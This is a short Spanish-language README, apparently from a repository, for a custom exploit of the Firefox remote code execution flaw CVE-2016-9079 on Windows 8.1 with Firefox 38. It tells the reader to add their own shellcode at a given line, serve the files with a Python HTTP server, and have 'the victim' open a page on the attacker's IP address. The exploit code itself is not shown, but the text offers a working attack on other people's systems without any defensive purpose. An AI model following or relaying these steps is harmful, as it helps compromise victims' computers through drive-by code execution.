
Exploit manual para Firefox RCE CVE-2016-9079 con shellcode personalizable, servido a través de HTTP para ejecución remota de código en sistemas Windows vulnerables.
Este es un exploit manual de https://www.exploit-db.com/exploits/41151, existe otro para Windows 10 (https://github.com/soham23/firefox-rce-nssmil) pero no funcionó en Windows 8.1, así que hice el mío.
Tienes que modificar la línea 241 con tu propio shellcode. Hay un ejemplo justo encima de esta línea.
Descarga el repositorio e inicia un servidor. Usar el servidor de Python funciona bien.
python3 -m http.server 8080
En tu víctima, navega a http://<attacker_ip>:8080/ y debería funcionar.
Probado en Windows 8.1 Entreprise x64 usando firefox 38.